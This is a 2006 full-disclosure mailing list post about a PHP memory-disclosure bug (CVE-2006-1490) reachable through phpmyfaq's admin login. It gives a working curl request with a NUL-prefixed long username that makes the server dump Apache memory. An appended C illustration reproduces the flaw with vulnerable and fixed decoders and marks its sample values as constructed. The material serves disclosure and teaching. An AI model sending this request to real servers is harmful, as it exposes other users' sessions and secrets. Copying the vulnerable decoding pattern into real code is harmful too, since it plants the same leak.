Date: Fri, 1 Dec 2006 16:57:41 +0200
From: Tonu Samuel <tonu@....ee>
To: full-disclosure@...ts.grok.org.uk
Subject: phpmyfaq exploit using PHP bug, CVE-2006-1490

A long time ago I made unnecessary noise about a PHP zero-day. I expected it to be 
maybe much more dangerous than it appeared to be in the end. There was a lot of 
discussion, and one of the main points of consensus was that this bug is not exploitable 
in the real world because no one is using those vulnerable functions.

This bug was originally found using the phpmyfaq software, and a wrong assumption was 
made about the breadth of the problem. Anyway, now, half a year later, it is time to show 
the exploit:

curl "http://vulnerablehost/phpmyfaq/admin/index.php" -D - -d "faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"

The longer the input you provide, the longer the memory dump you get. It works if PHP is 
unpatched AND phpmyfaq is older than 1.6.0. The memory dump you get is part of 
Apache's memory and often contains sensitive information from other served 
pages and contexts.

To make it clear: this is NOT the fault of the phpmyfaq people at all. Even more, 
they made a workaround within an hour after I contacted them and urged users to 
upgrade. It is just that phpmyfaq appears to be one popular piece of software which is easily 
findable via Google, and this was the software where the initial discovery was 
made. The PHP people knew about the problem but ignored it for long enough for it to be 
discovered independently of them.

   Tõnu

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
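The following is an added illustration and is not code from the post above, from PHP, or from phpmyfaq. It assumes that the bug behind the probe is the classic C-level mismatch between a NUL-terminated length (strlen()) and the explicit binary length of a PHP string, which is what the leading %00 in the payload suggests; that assumption is mine, not the poster's. A fixed-size arena stands in for the Apache process heap so the "leak" stays inside the program's own memory and is deterministic; the PROBE and SECRET values are constructed sample data.

```c
/* Added illustration (not PHP's or phpmyfaq's code): a decoder that sizes its
 * output buffer with strlen() but reports the caller's binary length turns a
 * NUL-prefixed input into a dump of whatever sits next to the allocation. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* A bump allocator over a fixed arena stands in for the process heap. */
#define ARENA_SIZE 256
static char arena[ARENA_SIZE];
static size_t arena_top;

static void arena_reset(void)
{
    memset(arena, 0, sizeof arena);
    arena_top = 0;
}

static char *arena_alloc(size_t n)
{
    if (arena_top + n > ARENA_SIZE)
        return NULL;
    char *p = arena + arena_top;
    arena_top += n;
    return p;
}

/* A PHP-style string: pointer plus explicit binary length. */
struct pstr {
    char *buf;
    size_t len;
};

/* VULNERABLE (assumed bug class): output sized by strlen(), which stops at
 * the first NUL, while the returned length is the full binary length. */
static struct pstr decode_vuln(const char *in, size_t in_len)
{
    size_t n = strlen(in);               /* 0 for "\0VERYLONG..." */
    char *out = arena_alloc(n + 1);      /* a 1-byte allocation */
    struct pstr r = { NULL, 0 };
    if (!out)
        return r;
    memcpy(out, in, n);
    out[n] = '\0';
    r.buf = out;
    r.len = in_len;                      /* but in_len bytes are claimed */
    return r;
}

/* FIXED: the explicit length is used for sizing, copying and reporting. */
static struct pstr decode_fixed(const char *in, size_t in_len)
{
    char *out = arena_alloc(in_len + 1);
    struct pstr r = { NULL, 0 };
    if (!out)
        return r;
    memcpy(out, in, in_len);
    out[in_len] = '\0';
    r.buf = out;
    r.len = in_len;
    return r;
}

typedef struct pstr (*decode_fn)(const char *, size_t);

/* The application echoes the decoded username into the response body, the way
 * a login form might. Returns the number of bytes placed in resp. */
static size_t build_response(decode_fn decode, const char *in, size_t in_len,
                             char *resp, size_t resp_cap)
{
    struct pstr u = decode(in, in_len);
    if (!u.buf)
        return 0;
    size_t n = u.len < resp_cap ? u.len : resp_cap;
    memcpy(resp, u.buf, n);
    return n;
}

/* Binary-safe substring search (the response may contain NUL bytes). */
static int contains(const char *hay, size_t hay_len, const char *needle)
{
    size_t nl = strlen(needle);
    if (nl == 0 || nl > hay_len)
        return 0;
    for (size_t i = 0; i + nl <= hay_len; i++)
        if (memcmp(hay + i, needle, nl) == 0)
            return 1;
    return 0;
}

/* Constructed sample data: the probe from the post, and a secret that a
 * previous request left behind in freed-but-not-zeroed memory. */
static const char PROBE[] = "\0VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";
#define PROBE_LEN (sizeof PROBE - 1)
static const char SECRET[] = "PHPSESSID=c0ffee4b1d; admin=1";
static char scratch[ARENA_SIZE];

/* Serve one request with the given decoder; return 1 if the previous
 * request's secret is visible in the response body. */
static int request_leaks_secret(decode_fn decode, char *resp, size_t resp_cap,
                                size_t *resp_len)
{
    arena_reset();
    memcpy(arena + 1, SECRET, strlen(SECRET));   /* leftover heap contents */
    size_t n = build_response(decode, PROBE, PROBE_LEN, resp, resp_cap);
    if (resp_len)
        *resp_len = n;
    return contains(resp, n, SECRET);
}

static void dump(const char *label, const char *p, size_t n)
{
    printf("%s (%zu bytes):", label, n);
    for (size_t i = 0; i < n; i++)
        printf(" %02x", (unsigned char)p[i]);
    putchar('\n');
}

int main(void)
{
    size_t n;
    int leak = request_leaks_secret(decode_vuln, scratch, sizeof scratch, &n);
    dump("vulnerable decoder", scratch, n);
    printf("previous request's secret visible: %s\n", leak ? "yes" : "no");
    leak = request_leaks_secret(decode_fixed, scratch, sizeof scratch, &n);
    dump("fixed decoder", scratch, n);
    printf("previous request's secret visible: %s\n", leak ? "yes" : "no");
    return 0;
}
```

The point the probe relies on is visible in decode_vuln: a longer PROBE makes the claimed length larger while the allocation stays one byte, so the response walks further into neighbouring memory, exactly the "longer input, longer dump" behaviour described in the post. The fixed decoder overwrites that region with the input itself and reports a length that matches what it allocated.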
